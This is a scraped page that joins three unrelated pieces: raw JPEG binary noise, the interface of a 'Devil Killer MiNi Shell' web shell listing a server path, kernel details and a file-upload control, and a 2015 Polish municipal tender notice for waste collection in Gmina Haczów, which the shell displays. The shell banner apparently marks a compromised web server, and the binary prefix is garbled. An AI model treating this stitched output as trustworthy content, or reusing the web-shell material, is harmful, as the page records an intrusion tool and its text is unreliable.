JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151022/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151022/282212-N-2015.html

<p class="kh_header"><b>Haczów: Odbiór   i zagospodarowanie  odpadów  komunalnych  z  terenu  Gminy Haczów.</b><br>
<b>Numer ogłoszenia: 282212 - 2015; data zamieszczenia: 22.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Haczów , Haczów 573, 36-213 Haczów, woj. podkarpackie, tel. 013 4391002, faks 013 4391696.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.haczow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór   i zagospodarowanie  odpadów  komunalnych  z  terenu  Gminy Haczów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia: 
1. Przedmiotem zamówienia jest wykonywanie usług  komunalnych na terenie gminy Haczów , polegających na odbiorze  i zagospodarowaniu  odpadów komunalnych z terenu  nieruchomości  zamieszkałych  obejmujących następujące  miejscowości: Haczów, Trześniów, Buków, Jasionów, Wzdów, Jabłonica Polska, Malinówka . 
Gmina Haczów liczy: 9.430 mieszkańców ok. 2.500 gospodarstw podzielonych na siedem sołectw. Średnia ilość wywiezionych  odpadów  komunalnych  ciągu w roku  z terenu Gminy Haczów wynosi ok. :  857   ton  z czego:
ok.  383,81  t.  to  odpady  mokre
ok.  423,86 t.  to  odpady  suche
ok.       3,2 t. odpady  tzw.  publiczne ( z ulicznych  koszy  na śmieci)
ok.       3,63 t.   to  odpady  zmieszane
ok.       5,1 t. to  odpady  budowlane
ok.     30,39 t,  to odpady  wielkogabarytowe
ok.       0,90 t.  to  odpady  niebezpieczne  
ok.       6 t. odpady  ze  spalania  paliwa  stałego  w  instalacjach c.o. ( popioły) 
Podana ilość odebranych  odpadów stanowi wartość orientacyjną i pomocniczą  dla Wykonawcy na etapie  kalkulowania  ceny oferty. Zamawiający zastrzega sobie prawo przekazania mniejszej lub większej ilości odpadów. Nie będą odbierane: odpady ciekłe, odpady nieznanego pochodzenia, odpady o składzie niezgodnym z dokumentami wymaganymi przy obrocie odpadami.  Zbiórka, wywóz i zagospodarowanie odpadów winno się odbywać zgodnie z wytycznymi Wojewódzkiego Planu Gospodarki Odpadami oraz przepisami prawa polskiego. Płatność  za  wykonane  usługi: co miesiąc  na  podstawie  wystawionej przez  Wykonawcę  faktury. Termin płatności  30  dni od  daty złożenia    na dziennik  podawczy Zamawiającego.

2. Sposób i zasady wywozu: Wywozem i zagospodarowaniem odpadów objęte  będą  wyłącznie    nieruchomości  zamieszkałe. Właściciele  nieruchomości  zamieszkałych  na których  powstają odpady  komunalne obowiązani  są  do  pozbywania  się  odpadów  komunalnych  z terenu  nieruchomości w oparciu o   system segregacji odpadów  z podziałem na odpady  mokre i odpady  suche. Odpady mają być zgromadzone w pojemnikach, workach zakupionych  przez Właścicieli nieruchomości z umieszczonym na nich czytelnym numerem identyfikacyjnym podatnika  nadanym  przez Urząd  Gminy  Haczów. Odpady  zmieszane, zielone oraz pozostałości  z  sortowania  odpadów  komunalnych    Wykonawca  ma ustawowy  obowiązek   dostarczyć  na  Regionalną Instalację do Przetwarzania  Odpadów    Komunalnych  w  Krośnie. Natomiast  odpady komunalne zebrane  selektywnie  do instalacji  odzysku  i  unieszkodliwiania  odpadów komunalnych , mają  być  zagospodarowane, zgodnie  z  hierarchią postępowania  z  odpadami , o  której  mowa  w  art. 7  ustawy    z  dnia   27  kwietnia 2001  r.  o odpadach. 

3. Rodzaje odbieranych  i zagospodarowywanych  odpadów:  
a) odpady mokre: pojemnik,worek ma być  wypełniony   resztkami żywności  resztkami  po  kawie, herbacie ( fusy), skorupkami po jajkach  i orzechach,  zużytymi  ręcznikami  papierowymi i chusteczkami  higienicznymi, mokrym  zabrudzonym papierem, pampersami, środkami  higieny osobistej , odpadami kuchennymi,  resztkami  i  obierkami  z  owoców  i  warzyw  oraz innymi odpadami  nadającymi  się  do  kompostowania.  Opis  pojemnika ,worka. Pojemnik,worek   o dowolnej  pojemności i kolorze , który zapewni  właściciel  nieruchomości
b) odpady suche : worek ma być  wypełniony  opakowaniami  z papieru i tektury, pudełkami  i  butelkami  plastikowymi, reklamówkami, foliami, puszkami   aluminiowymi i z  metali żelaznych, pojemnikami  po  produktach  mlecznych , kartonami po  napojach, gazetami, tekstyliami opakowaniami  drewnianymi, szkłem , odpadami  wielomateriałowymi. Worek  na  odpady  suche przeźroczysty o pojemności 120 litrów z  nadrukiem  Odpady segregowane  suche ,  który zapewni  właściciel  nieruchomości
c) Zmieszane odpady komunalne gromadzone będą w pojemnikach. Pojemniki do gromadzenia odpadów niesegregowanych  o  dowolnej  pojemności  i  kolorze,  które  zapewni właściciel nieruchomości i ustawi je w miejscach utwardzonych lub altanach śmietnikowych.

4.Częstotliwość  wywozu  odpadów   wymienionych w pkt. 3  lit. a,b,c  co  dwa  tygodnie  wg  harmonogramu  opracowanego  i załączonego  do  oferty  przez  Wykonawcę.

5.Miejsca  odbioru  odpadów: Odpady na  czas  odbioru  przez Wykonawcę  maja  znajdować  się  poza terenem  nieruchomości  przy  drogach  publicznych  wyznaczonych  do  przejazdu  śmieciarek  wg załączonej   do  niniejszej SIWZ  mapki  wskazującej  sieć  dróg  przebiegających  przez  teren  gminy Haczów. Ze względu na to, że  odbiór i transport  odpadów  odbywał się  będzie po sieci  dróg  zlokalizowanych  na terenie  gminy Haczów   w skład  których  wchodzą  drogi  : krajowa, wojewódzkie, powiatowe i  gminne, koniecznym  będzie  dostosowanie   pojazdów do warunków terenowych. Przeważającą  ilość   stanowią  drogi  gminne o szerokości  ok. 3 m usytuowane  w części  na terenie górzystym. Kalkulując  tabor  samochodowy  przeznaczony  do  wykonywania   usług  odbioru  i  zagospodarowania  odpadów  należy  uwzględnić powyższe  warunki. Wskazane jest  aby  wykonawca  posiadał leki  samochód  do  3,5  t.  umożliwiający odbiór  z odpadów  z terenów trudno dostępnych       i  o  małej  gęstości  zaludnienia.  
6. Miejsce  wywozu i zagospodarowania odpadów: zgodnie z  ustawą  o  utrzymaniu  czystości  i  porządku w  gminach  i   Wojewódzkim Planem Gospodarki  Odpadami. 
7. Inne  odpady odbierane i  zagospodarowywane  przez Wykonawcę: 
a)odpady wielkogabarytowe : odbiór odpadów wielkogabarytowych będzie się odbywać  poprzez odbieranie wystawionych w/w odpadów przez właścicieli nieruchomości. Miejsca  odbioru  odpadów: Odpady na  czas  odbioru  przez Wykonawcę  mają  znajdować  się  poza terenem  nieruchomości  przy  drogach  publicznych  wyznaczonych  do  przejazdu  śmieciarek. Częstotliwość wywozu:  raz do  roku w sierpniu.
 b) zużyty sprzęt  elektryczny i elektroniczny, baterie  - nie jest objęty niniejszym postępowaniem o  udzielenie  zamówienia  publicznego 
c)odpady budowlane,  raz  w  roku podczas  zbiórki  organizowanej przez  Urząd  Gminy  Haczów  z terenu całej  gminy. Odpady na  czas  odbioru  przez Wykonawcę  mają  znajdować  się  poza terenem  nieruchomości  przy  drogach  publicznych  wyznaczonych  do  przejazdu  śmieciarek. Częstotliwość wywozu:  raz do  roku we wrześniu.
d) odpady niebezpieczne typu leki, farby  , lakiery , środki  ochrony  roślin wraz  opakowaniami :  raz   w  roku podczas  zbiórki  organizowanej przez  Urząd  Gminy  Haczów  z terenu całej  gminy. Odpady na  czas  odbioru  przez Wykonawcę  mają  znajdować  się  poza terenem  nieruchomości  przy  drogach  publicznych  wyznaczonych  do  przejazdu  śmieciarek. Częstotliwość wywozu:  raz do  roku w  październiku .
e) odpady komunalne  zmieszane tzw.  publiczne  ( z koszy  na śmieci  zlokalizowanych w miejscach  publicznych) Częstotliwość wywozu : dwa  razy  w  miesiącu. Miejsce zbiórki: place  przed  Domami  Ludowymi i Urzędem Gminy w Haczowie.
f) popiół  z instalacji  c.o. budynków  mieszkalnych . Częstotliwość wywozu  raz  w  miesiącu. W  miesiącach od  października  do  kwietnia .Odpady na  czas  odbioru  przez Wykonawcę  mają  znajdować  się  poza terenem  nieruchomości  przy  drogach  publicznych  wyznaczonych  do  przejazdu  śmieciarek.
8. Obowiązki  wykonawcy: 
- odbiór i zagospodarowanie  odpadów  od właścicieli  nieruchomości zamieszkałych   z terenu  Gminy Haczów zgodnie  z harmonogramem  w tym  przekazywanie   odebranych od właścicieli  nieruchomości selektywnie zebranych  odpadów komunalnych  do  instalacji odzysku i unieszkodliwiania  odpadów , zgodnie  z  hierarchią postępowania  z  odpadami  określoną  w  ustawie  o  odpadach.
- przekazywanie  odebranych  od  właścicieli  nieruchomości zmieszanych  odpadów  komunalnych, odpadów  zielonych oraz  pozostałości z  sortowania odpadów przeznaczonych  do  składowania  na  regionalnej  instalacji do  przetwarzania  odpadów  komunalnych.
-informowanie Zamawiającego o przypadkach  niedopełniania przez  właściciela-li  nieruchomości obowiązku  w  zakresie selektywnego zbierania  odpadów  komunalnych. 
- sporządzanie  półrocznych   sprawozdań  i przekazywanie ich zamawiającemu  w terminie   do końca miesiąca następującego po upływie półrocza, którego dotyczy , zgodnie z ustawą o utrzymaniu  czystości  i porządku  w gminach. 
 - wykonywanie obowiązków  wynikających  z  aktualnie  obowiązujących ustaw i rozporządzeń w zakresie  gospodarowania  odpadami.,
-wykonawca zobowiązany jest kontrolować właścicieli nieruchomości pod kątem wypełniania obowiązku zbierania odpadów komunalnych zgodnie z Regulaminem utrzymania czystości i porządku na terenie Gminy Haczów oraz w zadeklarowany sposób (zbierane selektywnie bądź jako odpady zmieszane),  a w przypadku stwierdzenia niezgodności z zapisami Regulaminu utrzymania czystości i porządku na terenie Gminy Haczów, Wykonawca winien odebrać odpady jako zmieszane powiadamiając o tym fakcie Zamawiającego, podając dane adresowe nieruchomości (miejscowość, ulica, numer domu) dane ilościowe i dowody potwierdzające zaistniałe zdarzenie (notatka, dokumentacja fotograficzna). Notatka powinna zawierać w szczególności: adres nieruchomości, na której odpady gromadzone są niezgodnie  z wymaganiami regulaminu (deklaracją), rodzaj niezgodności i termin odbioru odpadów. Notatka powinna być podpisana przez dwóch pracowników odbierających odpady. Wykonawca jest również zobowiązany do wyrywkowej kontroli właścicieli nieruchomości zamieszkałych wskazanych przez Zamawiającego.  
-W przypadku stwierdzenia, że nieruchomość, na której zamieszkują mieszkańcy, a powstają odpady komunalne nie jest ujęta w wykazie nieruchomości, który będzie na bieżąco aktualizowany przez Zamawiającego, Wykonawca zobowiązany jest niezwłocznie powiadomić o tym pisemnie bądź pocztą elektroniczną Zamawiającego.  
-wykonawca zorganizuje odbiór i transport odpadów, również w przypadkach, kiedy dojazd do właścicieli nieruchomości zamieszkałych będzie utrudniony z powodu prowadzonych remontów dróg, zmiany organizacji ruchu drogowego itp. W takich przypadkach Wykonawcy nie przysługują roszczenia z tytułu wzrostu kosztów realizacji przedmiotu umowy. W przypadku braku możliwości dojazdu odpady komunalne winny zostać odebrane w możliwie najkrótszym terminie.  
-Wykonawca odpowiada za awarie samochodów i sprzętu przeznaczonego do odbioru, transportu. Wykonawca będzie ponosił koszty opóźnienia w odbiorze odpadów. 
-Wykonawca jest zobowiązany do utrzymania czystości urządzeń i pojazdów, którymi będzie odbierał  i transportował odpady w celu osiągnięcia wymaganego standardu świadczonych usług.  
-Wykonawca będzie realizował przedmiot zamówienia bez względu na warunki atmosferyczne.  
-Zamawiający zastrzega sobie prawo do zwiększenia lub zmniejszenia liczby obsługiwanych nieruchomości w zakresie odbioru odpadów komunalnych.  
-Zamawiający i właściciele nieruchomości zabudowanych winni mieć zapewnioną przez wykonawcę możliwość kontaktu telefonicznego oraz drogą emaliową z jego przedstawicielem -  co najmniej  w godzinach: 7.00 - 15.00 w dni robocze.   
-Wykonawca zapewni, aby odbiór odpadów komunalnych dokonywany był przez osoby wyposażone  w ubrania robocze z wyraźnym oznaczeniem nazwy firmy Wykonawcy. 
-Za ewentualne szkody spowodowane w ramach wykonywania przedmiotu umowy na nieruchomościach odpowiada Wykonawca. W szczególności w przypadku uszkodzenia lub  zniszczenia mienia Zamawiającego lub osób trzecich w toku realizacji przedmiotu umowy, Wykonawca zobowiązuje się doprowadzić go do stanu pierwotnego i naprawić szkodę na własny koszt. Wykonawca ponosi odpowiedzialność za ewentualne szkody wyrządzone przez pojazdy odbierające odpady. Wykonawca zobowiązuje się dostosować wielkość i rodzaj pojazdów odbierających odpady do tonażu, szerokości, rodzaju nawierzchni i innych parametrów dróg. 
-Wykonawca zachowa uzyskane w takcie realizacji umowy dane, a w szczególności dane osobowe,  w poufności, będzie przestrzegał zasad wynikających z ustawy o ochronie danych osobowych i nie wykorzysta ich do innych celów niż wynikające z realizacji przedmiotowego zamówienia. 
-W przypadku zmiany obowiązujących przepisów prawa w szczególności związanych z przedmiotem zamówienia Zamawiający i Wykonawca określą zakres czynności zmierzających do wypełnienia postanowień umowy i sposób ich realizacji. 
-Wykonawca zobowiązuje się do stałego kontaktu z Zamawiającym w sprawach dotyczących przedmiotu zamówienia, w tym celu Wykonawca wyznaczy Koordynatora, z którym Zamawiający będzie mógł się kontaktować bezpośrednio w dni robocze od poniedziałku do piątku w godzinach od 700do 1500. Koordynator odpowiadał będzie za nadzorowanie ze strony Wykonawcy wykonywania przedmiotu umowy. Również Zamawiający ze swojej strony wyznaczy Koordynatora, w celu kontaktu z Wykonawcą w sprawach dotyczących realizacji umowy.  
-Wykonawca ponosi całkowitą odpowiedzialności za prawidłowe gospodarowanie odebranymi odpadami, zgodnie z obowiązującymi w tym zakresie przepisami. W szczególności w zakresie odbioru, transportu  i zagospodarowania odpadów oraz osiągnięcia odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami wymienionych ustawie z dnia 13 września 1996 r.  o utrzymaniu czystości i porządku w gminach (Dz. U. z 2012 r. poz. 391 z poźn. zm.). 
-Wykonawca jest odpowiedzialny za standard sanitarny usług oraz ochrony środowiska. Wykonawca będzie realizował przedmiot zamówienia zgodnie z przepisami prawa ochrony środowiska oraz przepisami sanitarnymi, w tym rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 r.  w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. 2013, poz. 122). 
-Wykonawca zobowiązany jest do zagospodarowania odebranych odpadów w sposób, który zapewni osiągnięcie odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i odzysku niektórych frakcji odpadów komunalnych, o których mowa w Rozporządzeniu Ministra Środowiska  z dnia 29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. z 2012 r. poz. 645). 
Ustalenie, czy Wykonawca osiągnął wymagane poziomy recyklingu, przygotowania do ponownego użycia i odzysku, nastąpi na podstawie przedłożonego Zamawiającemu  sprawozdania,
-Wykonawca ma obowiązek składać Zamawiającemu kwartalne sprawozdania zgodnie z art. 9n ust. 1-3 ustawy o utrzymaniu czystości i porządku w gminach w zakresie odbieranych odpadów (nie dotyczy odpadów przekazywanych do RIPOK). Wykonawca zobowiązany jest także zamieścić w sprawozdaniu informację o osiągniętych poziomach recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami.  
-Wykonawca obowiązany jest do okazania na żądanie Zamawiającego dokumentów sporządzonych na potrzeby ewidencji odpadów oraz dokumentów potwierdzających osiągnięcie określonych poziomów recyklingu, przygotowania do ponownego użycia i odzysku oraz ograniczenia masy odpadów ulegających biodegradacji przekazywanych do składowania..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.00.00-5, 90.51.20.00-9, 90.51.30.00-6, 90.51.40.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu dokonania oceny  spełniania w/w warunku niezbędne są:
a) Dokument potwierdzający  posiadanie  uprawnień  do  wykonywania określonej  działalności  lub czynności , jeżeli przepisy prawa nakładają  obowiązek ich  posiadania , w szczególności  koncesji  , zezwolenia  lub  licencji tj. 
a) Kopia aktualnego  wpisu do rejestru  działalności  regulowanej w zakresie  odbierania  odpadów komunalnych  od  właścicieli  nieruchomości  z terenu  gminy Haczów,  celu wykazania braku podstaw do wykluczenia na podstawie art. 24 ust. 1 pkt 2 ustawy PZP</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca posiada niezbędną wiedzę i doświadczenie, jeżeli wykaże się:
a) wykonaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 usług odbioru  odpadów  komunalnych wykonanych  na  rzecz  właścicieli  nieruchomości  lub gmin  w  sposób  ciągły  przez  okres  minimum  12 miesięcy  o masie   minimum  850 Mg / rok
Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez wykonawcę oraz na podstawie następujących dokumentów, jakie wykonawca powinien złożyć w postępowaniu:
a)wykaz wykonanych  , a w przypadku świadczeń okresowych lub ciągłych  również  wykonywanych , głównych  usług  w okresie ostatnich trzech lat przed upływem terminu składania ofert albo  wniosków  o  dopuszczenie  do  udziału  w  postępowaniu  , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, , wraz z podaniem  ich  wartości , przedmiotu, dat  wykonania  i podmiotów na rzecz których  usługi zostały  wykonane  oraz załączeniem dowodów czy  zostały wykonane  lub są wykonywane  należycie.
Dowodami są; poświadczenie , z tym, że w odniesieniu  do  nadal wykonywanych usług okresowych  lub ciągłych poświadczenie  powinno  być wydane nie wcześniej  niż na  3 miesiące przed upływem terminu  składania ofert. Jeżeli  z  uzasadnionych przyczyn o obiektywnym charakterze  wykonawca nie jest  w  stanie  uzyskać poświadczenia, składa oświadczenie.
W przypadku gdy zamawiający jest podmiotem  na rzecz którego  usługi  wskazane  w  wykazie  zostały wcześniej  wykonane, wykonawca nie ma  obowiązku przedkładania  dowodów  wyżej wymienionych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca dysponuje potencjałem technicznym  do wykonania zamówienia, jeżeli:
a) dysponuje lub  dysponował będzie  sprzętem adekwatnym do wykonania niniejszego zamówienia , zgodnym  z  Rozporządzeniem   Ministra  Środowiska   z  dnia  11  stycznia  2013 r.  w sprawie   szczegółowych   wymagań   w  zakresie   odbierania   odpadów  komunalnych   od  właścicieli  nieruchomości. (Dz.U. z 2013 r. poz.  122)	
Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez wykonawcę oraz na podstawie następujących dokumentów, jakie wykonawca powinien złożyć w postępowaniu:
a) wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy   usług  w celu realizacji  zamówienia  wraz  z  informacją o podstawie  dysponowania tymi zasobami, określonymi szczegółowo  w  Rozporządzeniu  Ministra  Środowiska  z  dnia  11  stycznia  2013 r.  w  sprawie   szczegółowych   wymagań  w  zakresie  odbierania   odpadów  komunalnych od  właścicieli  nieruchomości tj:
- co  najmniej  dwóch  pojazdów  przystosowanych  do  odbierania   zmieszanych   odpadów  komunalnych 
- co najmniej  dwóch  pojazdów  przystosowanych do  odbierania   selektywnie  zebranych  odpadów  komunalnych 
co  najmniej  jeden  pojazd    do  odbierania    odpadów  bez  funkcji  kompaktujacej. 
Konstrukcja  pojazdów zabezpieczać  ma  przed  rozwiewaniem , rozpylaniem  przewożonych  odpadów  oraz minimalizowaniem  oddziaływania  czynników  atmosferycznych  na  odpady. 
 Pojazdy  mają  być    wyposażone  w  system:
- monitoringu  bazującego  na   systemie  pozycjonowania  satelitarnego, umożliwiający  trwałe  zapisywanie, przechowywanie i odczytywanie  danych  o  położeniu pojazdu                      i  miejscach  postoju oraz  czujników     zapisujących  dane  o  miejscach    wyładunku  odpadów -  umożliwiający  weryfikację   tych  danych
- pojazdy mają  być   wyposażone  w  narzędzia  lub  urządzenia  umożliwiające sprzątanie   terenu  po   opróżnieniu  pojemników  oraz  urządzenie  do  ważenia  odpadów  komunalnych 
Wyposażenie  bazy  magazynowo  sprzętowej ma  być  zgodne   z  cyt. wyżej  Rozporządzeniem  Ministra  Środowiska  w  sprawie szczegółowych   wymagań  w  zakresie   odbierania  odpadów  komunalnych   od  właścicieli  nieruchomości § 2  ust 1 ,2 ,3,4</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca dysponuje osobami zdolnymi do wykonania zamówienia, jeżeli:
a) dysponuje lub  dysponował będzie  sprzętem adekwatnym do wykonania niniejszego zamówienia , zgodnym  z  Rozporządzeniem   Ministra  Środowiska   z  dnia  11  stycznia  2013 r.  w sprawie   szczegółowych   wymagań   w  zakresie   odbierania   odpadów  komunalnych   od  właścicieli  nieruchomości. (Dz.U. z 2013 r. poz.  122)
 a) dysponuje lub dysponował będzie  osobami do wykonania zamówienia,		
Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez wykonawcę oraz na podstawie następujących dokumentów, jakie wykonawca powinien złożyć w postępowaniu:
